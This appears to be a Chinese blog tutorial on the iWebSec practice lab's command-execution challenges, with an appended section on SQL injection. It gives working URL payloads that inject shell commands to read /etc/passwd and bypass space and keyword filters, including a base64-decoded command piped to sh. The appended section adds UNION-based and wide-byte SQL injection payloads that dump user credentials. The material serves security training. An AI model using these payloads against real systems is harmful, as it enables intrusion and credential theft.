iwebsec靶场(命令执行)

本文介绍了远程代码执行的概念及其危害,列举了PHP中涉及的函数,如eval()和system()等,同时讲解了Windows和Linux的命令拼接符。文章还提供了iWebSec靶场的实践场景,包括如何执行系统命令、查看系统文件以及绕过空格和关键命令的过滤方法,展示了命令执行漏洞的各种利用方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

iwebsec靶场(命令执行)

一、什么是远程代码执行

  • 产生原因:由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用,控制服务器。

  • 漏洞危害:

    1、获取服务器权限
    2、获取敏感数据文件
    3、写入恶意文件getshell
    4、植入木马病毒勒索软件等

二、PHP-RCE涉及函数

1.代码注入
函数作用
eval()把字符串 code 作为PHP代码执行
assert()检查一个断言是否为 false
preg_replace()执行一个正则表达式的搜索和替换
create_function()创建一个匿名函数并且返回函数名创
call_user_func()/call_user_func_array()把第一个参数作为回调函数调用
usort()/uasort()使用用户自定义的比较函数对数组中的值进行排序并保持索引关联
2.命令注入
函数作用
system()执行外部程序,并且显示输出
exec()/shell_exec()通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回
pcntl_exec()在当前进程空间执行指定程序
passthru()执行外部程序并且显示原始输出
popen()打开进程文件指针
proc_open()执行一个命令,并且打开用来输入/输出的文件
指针

三、命令拼接符

1.Windows命令拼接符
符号作用示例
&&左边的命令执行成功,右边的才执行ping 127.0.0.1 && echo “hello”
&简单的拼接ping 1111& echo"hello"
|上一条命令的输出,作为下一条命令参数netstat -ano|findstr 3306
||左边的命令执行失败,右边的才执行ping baidu.com||ping baidu.net
2.Linux命令拼接符
符号作用示例
;没有任何逻辑关系的拼接符ping baidu.com;echo “hello”
&&左边的命令执行成功,右边的才执行cp 1.txt 2.txt && cat 2.txt
|上一条命令的输出,作为下一条命令的参数netstat -an|grep 3306
||左边的命令执行失败,右边的才执行cat 3.txt||cat 2.txt
&任务后台执行,与nohup命令功能差不多java -jar test.jar > log.txt &

四、靶场地址:http://iwebsec.com/

五、命令执行漏洞

1.执行系统命令
/exec/01.php?ip=127.0.0.1;ls

可以将;换成|

请添加图片描述

2.查看系统文件
/exec/01.php?ip=127.0.0.1;cat%20/etc/passwd

请添加图片描述

六、命令执行漏洞空格绕过

1.执行不需要空格的命令
/exec/02.php?ip=127.0.0.1;ifconfig

请添加图片描述

2.使用%09
  • %09是TAB键的url编码

    /exec/02.php?ip=127.0.0.1;cat%09/etc/passwd
    

    请添加图片描述

3.使用<
  • <表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。“命令 < 文件” ,这是将文件作为命令输入。

    /exec/02.php?ip=127.0.0.1;cat</etc/passwd
    
4.使用{},
  • {}内是整体的命令,逗号就是空格的作用

    /exec/02.php?ip=127.0.0.1;{cat,/etc/passwd}
    
5.使用$IFS$9
  • 在bash下,可以用$IFS$9代替空格

    /exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd
    

七、命令执行漏洞关键命令绕过

1.常规绕过
  • 使用常规而且未被过滤的命令

    请添加图片描述

    /exec/03.php?ip=127.0.0.1;less%20/etc/passwd
    

    请添加图片描述

2.使用符号及拼接
  • 使用不同符号拼接成完整的命令

    /exec/03.php?ip=127.0.0.1;ca%27%27t%20/etc/passwd
    

八、命令执行漏洞通配符绕过

  • 使用通配符*替代某些字符

    /exec/04.php?ip=127.0.0.1;cat%20/et*/passw*
    

    请添加图片描述

九、命令执行漏洞base64编码绕过

  • 将命令进行base64编码

    /exec/05.php?ip=127.0.0.1;echo%20Y2F0IC9ldGMvcGFzc3dk|base64%20-d|sh
    

    请添加图片描述

    请添加图片描述

### 关于iwebsec靶场中字符型SQL注入漏洞分析 在探讨iwebsec靶场中的字符型SQL注入漏洞时,需理解其核心在于利用特定字符串构造来绕过输入验证机制并执行恶意查询。当应用程序未能正确处理特殊字符或未对用户输入做充分过滤时,攻击者可以通过提交精心设计的数据引发数据库错误或获取敏感信息。 对于字符型注入而言,在构建测试用语句时通常会附加单引号 `'` 来闭合原有查询条件,并通过联合选择 `UNION SELECT` 或其他方法尝试读取额外的信息[^5]。例如: ```sql ?id=1' UNION SELECT 1,2,3--+ ``` 此命令试图关闭原始查询并通过追加新的SELECT子句返回自定义的结果集;然而,如果结尾处缺少必要的注释符号(即双连字符 `--`),这可能导致语法不匹配从而引起服务器端异常响应。 为了进一步探索目标系统的结构以及潜在的安全弱点,可以采用如下策略来进行更深入的渗透测试: - **确认注入点**:先确定是否存在可被利用的位置,比如上述提到的ID参数。 - **探测列数**:使用ORDER BY指令调整输出顺序直至找到最大有效索引值,以此推断出内部表格所含有的字段数目。如下面的例子展示了如何检测第四列为上限的情况: ```php /sqli/02.php?id=-1%df%27%20order%20by%204--+ ``` - **提取元数据**:一旦知道了表内有多少个属性,则可通过GROUP_CONCAT()函数一次性抓取多个记录的内容。这里给出了一种方式用于收集用户名和密码组合: ```sql ?id=-1 UNION SELECT 1,2,GROUP_CONCAT(CONCAT_WS(0x7E,username,password)) FROM iwebsec.user-- ``` 值得注意的是,以上操作均基于假设环境下的实验性质活动,并非真实世界里的合法行为。实际开发过程中应当遵循安全编码实践以防止此类风险的发生,同时定期审查现有防护措施的有效性。 #### 宽字节注入技巧 考虑到某些情况下Web应用可能运行在一个特殊的字符集环境中(如GBK),此时还可以运用所谓的“宽字节注入”。这种技术依赖于多字节字符集中存在的特性——部分字符由两个连续字节组成,其中一个可能是反斜杠 `\` ,它作为转义符会影响后续字符解释的方式[^4]。 具体来说就是发送形似 `%DF'` 的请求片段给服务端解析器,后者会在遇到这样的序列之前插入一个反斜杠变成类似于 `%DF\%'` 这样的形式。而在GBK编码下,这个新产生的三字节串正好对应着某个有效的汉字,因此整个表达式不会触发任何报警而是按照预期逻辑继续向下执行下去。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值